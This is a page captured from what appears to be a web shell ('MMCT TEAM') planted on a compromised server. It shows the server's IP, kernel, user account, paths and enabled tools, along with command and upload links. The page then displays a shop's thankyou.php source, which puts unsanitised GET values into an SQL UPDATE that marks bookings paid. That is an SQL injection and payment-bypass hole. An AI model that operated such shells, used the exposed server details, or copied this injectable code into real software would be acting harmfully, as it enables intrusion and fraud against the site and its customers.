MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.136.23.132
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/rajwadahouse.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/rajwadahouse.com/thankyou.php
<?php 
    session_start();
?>
<!doctype html>
<html class="no-js" lang="zxx">

<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?php include "top-links.php";?>
    <title>Thank You</title>
    <meta name="description" content="Thank You">
    <style>
        .content-thanks h3{
                font-size: 45px;
                    font-weight: 800;
        }
        .content-thanks p{
               color:#cbb440;
               font-size:15px;
                   font-weight: 500;
        }
        .content-thanks span{
               color:#25693c;
        }
    </style>
</head>

<body>

    <div id="main-wrapper">

        <?php include "header.php";?>
        <?php
        $order_id=$_GET['order_id'];
        $transaction_id=$_GET['transaction_id'];
        if($order_id!='' & $transaction_id!=""){
            $sql="UPDATE `tbl_booking` SET `payment_status`='Paid', `booking_status`='Confirm', `transaction_id`='$transaction_id' WHERE `book_id`= '$order_id'";
            $result = mysqli_query($db, $sql);
        }
        session_start();
        session_destroy();
        ?>
        <!-- Page Banner Section Start -->
        <div class="page-banner-section section bg-image" data-bg="<?php echo $wspath?>assets/images/bg/breadcrumb.jpg">
            <div class="container">
                <div class="row">
                    <div class="col">
                        
                        <div class="page-banner text-center">
                            <h1 >Thank You</h1>
                            <ul class="page-breadcrumb">
                                <li><a href="<?php echo $wspath?>">Home</a></li>
                                <li>Thank You</li>
                            </ul>
                        </div>
                        
                    </div>
                </div>
            </div>
        </div>
        <!-- Page Banner Section End -->

        <div class="container pt-50 pb-50">
            <div class="row">
                <div class="col-lg-6">
                <img src="<?php echo $wspath?>assets/img/5744ceb8e7a0827d323861a380b23de8.jpg">
            </div>
            <div class="col-lg-6">
                <div class="content-thanks">
                    <div class="text-center pt-50">
                        <h3>Thank You For Choosing <span>Rajwada House</span></h3>
                    </div>
                    <p>
                        Dear Valued Customer,<br>

Thank you for choosing Rajwada House for your handloom and handicraft needs. Each piece you’ve purchased is a reflection of the rich cultural heritage and craftsmanship we proudly offer. We appreciate your support and trust in our products.
<br>
Your order will be carefully prepared and dispatched shortly. If you have any questions or need further assistance, please don't hesitate to contact us.
<br>
We hope your purchase brings warmth and elegance to your home.
<br>
Warm regards,<br>
The Rajwada House Team
                    </p>
                    <a href="<?php echo $wspath?>" class="btn btn-outline-Success">Go Back</a>
                </div>
            </div>
            </div>
        </div>
        <?php include "footer.php";?>

    </div>


</body>


</html>

MMCT - 2023